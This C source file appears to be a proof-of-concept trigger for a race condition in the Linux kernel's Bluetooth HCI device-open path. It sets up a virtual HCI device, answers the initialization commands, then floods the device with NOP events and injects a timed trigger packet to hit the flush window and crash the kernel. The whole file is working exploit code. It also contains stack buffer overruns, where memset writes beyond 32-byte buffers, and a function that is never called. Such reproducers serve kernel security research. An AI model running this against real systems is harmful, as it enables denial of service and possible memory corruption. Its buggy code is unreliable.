/*
 * race_uart.c
 * It aims to awake hci_cmd_work even after the flush() is done
 * in funciton hci_dev_do_open() vulnerable
 *
 * different with race.c, it relies on the PTMX uart
 * gcc race_uart.c ptmx_sim.c -o race_uart -lpthread
 */

#include <stdio.h>
#include <stdlib.h>
#include <time.h>

#include "need.h"
#include "ptmx_sim.h"

// below three macros are mutate-able to help reproduce the crash
#define NOP_PACKETS_SLOT1 0x200
#define NOP_PACKETS_SLOT2 0x400
#define MYHCI_CMD_TIMEOUT 1.9

static int vhci_fd = -1;
int getLastpkt = 0;
int getThispkt = 0;

void fail(char * x){
    printf("failmsg : %s\n",x);
    exit(0);
}

void* nop_thread()
{
	char replybuf1[32] = {0};
	char replybuf2[32] = {0};

	replybuf1[0] = '\x04';
	replybuf1[1] = '\x0e';
	replybuf1[2] = '\x03'; // byte length
	replybuf1[3] = '\x01'; // num
	replybuf1[4] = '\x00';
	replybuf1[5] = '\x00';

	replybuf2[0] = '\x04';
	replybuf2[1] = '\x0e';
	replybuf2[2] = '\x08';
	replybuf2[3] = '\x01'; // num
	replybuf2[4] = '\x38'; // opcode
	replybuf2[5] = '\x0c';

	memset(replybuf1 + 6, 0, 32);
	memset(replybuf2 + 6, 0, 32);

	while (!getLastpkt); 

	clock_t start_time;
	clock_t curr_time;
	double time_spent;

	start_time = clock();

	while (1) {
		curr_time = clock();
		time_spent = (double)(curr_time - start_time) / CLOCKS_PER_SEC;
		if (time_spent >= MYHCI_CMD_TIMEOUT) // mutator: we can send packets in the last 0.1 seconds
			break;
	}

	// we keep fill a lot of NOP to busy the rx
	for(int i = 0; i < NOP_PACKETS_SLOT1; i++) {
		write(vhci_fd, replybuf1, 6);
	}
	// inject the trigger command too
	write(vhci_fd, replybuf2, 11);
	// create a time window in flush_work(&hdev->rx_work) and skb_queue_purge(&hdev->cmd_q);
	for(int i = 0; i < NOP_PACKETS_SLOT2; i++) {
		write(vhci_fd, replybuf1, 6);
	}
}

void hack_init2(void) {
	char replybuf[1024] = {0};
	char recvbuf[1024] = {0};
	ssize_t buf_size;

	memcpy(replybuf + 3, recvbuf, 1021);
	replybuf[0] = '\x04';
	replybuf[1] = '\x0e';
	replybuf[2] = '\x08';
	replybuf[3] = '\x01'; // num
	replybuf[4] = '\x38'; // opcode
	replybuf[5] = '\x0c';
	memset(replybuf + 6, 0, 1018);

	while (1) {
		buf_size = read(vhci_fd, recvbuf, sizeof(recvbuf));
		if (buf_size < 0)
			fail("read failed");
		
		// check command
		if (buf_size == 0 || recvbuf[0] != HCI_COMMAND_PKT)
			return;
		// parse command
		struct hci_command_hdr* hdr = (struct hci_command_hdr*)(recvbuf + 1);
		buf_size -= 1; // -1 for HCI packet type

		if (buf_size < (ssize_t)sizeof(struct hci_command_hdr) ||
			hdr->plen != buf_size - sizeof(struct hci_command_hdr)) {
			printf("forward_packet: invalid size =%zx", buf_size);
			exit(0);
		}
		
		// HCI_OP_READ_NUM_SUPPORTED_IAC is the 4-th packet
		if (hdr->opcode == HCI_OP_READ_NUM_SUPPORTED_IAC) {
			getLastpkt = 1;	// we have to be ready for the last 2 seconds
			break;
		}
	}
}

void forward_packet(void){
    char recvbuf[1024] = {0};
	ssize_t buf_size = read(vhci_fd, recvbuf, sizeof(recvbuf));
	if (buf_size < 0)
		fail("read failed");
	
	// check command
	if (buf_size == 0 || recvbuf[0] != HCI_COMMAND_PKT)
		return;
	// parse command
	struct hci_command_hdr* hdr = (struct hci_command_hdr*)(recvbuf + 1);
	buf_size -= 1; // -1 for HCI packet type

	printf("[+] process hdr->opcode = %x\n", hdr->opcode);

	if (buf_size < (ssize_t)sizeof(struct hci_command_hdr) ||
	    hdr->plen != buf_size - sizeof(struct hci_command_hdr)) {
		printf("forward_packet: invalid size =%zx", buf_size);
        exit(0);
    }
    char outbuf[65];
	char inbuf[5];
	char replybuf[1024] = {0};
	
	memcpy(replybuf + 3, recvbuf, 1021);
	replybuf[0] = '\x04';
	replybuf[1] = '\x0e';
	memset(replybuf + 6, 0, 1018);

	switch (hdr->opcode) {
       case HCI_OP_RESET:
			replybuf[2] = '\x04';
			write(vhci_fd, replybuf, 7);
			break;
        case HCI_OP_READ_LOCAL_FEATURES:
			replybuf[2] = '\x0c';
			// dumb feature
			// memcpy(replybuf + 7, outbuf, 8);
			write(vhci_fd, replybuf, 15);
			break;
        case HCI_OP_READ_LOCAL_VERSION:
			replybuf[2] = '\x0c';
			// dumb version
			// memcpy(replybuf + 7, outbuf, 8);
			write(vhci_fd, replybuf, 15);
			break;
        case HCI_OP_READ_BD_ADDR:
			replybuf[2] = '\x0a';
			memset(outbuf, '\x0b', 6);
			memcpy(replybuf + 7, outbuf, 6);
			write(vhci_fd, replybuf, 13);
			break;
	}
}

void pass_init1()
{
	// 4 packets to answer
	forward_packet();
	forward_packet();
	forward_packet();
	forward_packet();
}

void initialize_vhci()
{
	int hci_sock = socket(AF_BLUETOOTH, SOCK_RAW, BTPROTO_HCI);
	if (hci_sock < 0)
		fail("socket(AF_BLUETOOTH, SOCK_RAW, BTPROTO_HCI) failed");

	vhci_fd = open("/dev/vhci", O_RDWR);
	if (vhci_fd == -1)
		fail("open /dev/vhci failed");

	uint8_t create_req[2] = { 0xff, 0x0 };
	ssize_t written;
	written = write(vhci_fd, create_req, sizeof(create_req));
	if (written < 0) {
			fail("Failed to set device type");
			close(vhci_fd);
			return ;
	}

	// Remap vhci onto higher fd number to hide it from fuzzer and to keep
	// fd numbers stable regardless of whether vhci is opened or not (also see kMaxFd).
	const int kVhciFd = 241;
	if (dup2(vhci_fd, kVhciFd) < 0)
		fail("dup2(vhci_fd, kVhciFd) failed");
	close(vhci_fd);
	vhci_fd = kVhciFd;

	struct vhci_vendor_pkt vendor_pkt;
	if (read(vhci_fd, &vendor_pkt, sizeof(vendor_pkt)) != sizeof(vendor_pkt))
		fail("read failed");

	if (vendor_pkt.type != HCI_VENDOR_PKT)
		fail("wrong response packet");

}




int main(){
    // create the vhci device
    vhci_fd = initialize_hci_uart().mfd;
    // let the hci_init1_req noramlly finish
    pass_init1();
    
    // awake thread to busy the rx channel
    pthread_t th;
    pthread_create(&th, NULL, nop_thread, NULL);

    // timeout for hci_init2_req
    hack_init2();
    
    // dead loop to see the effect
    while(1) {}
	// sleep(2);
}
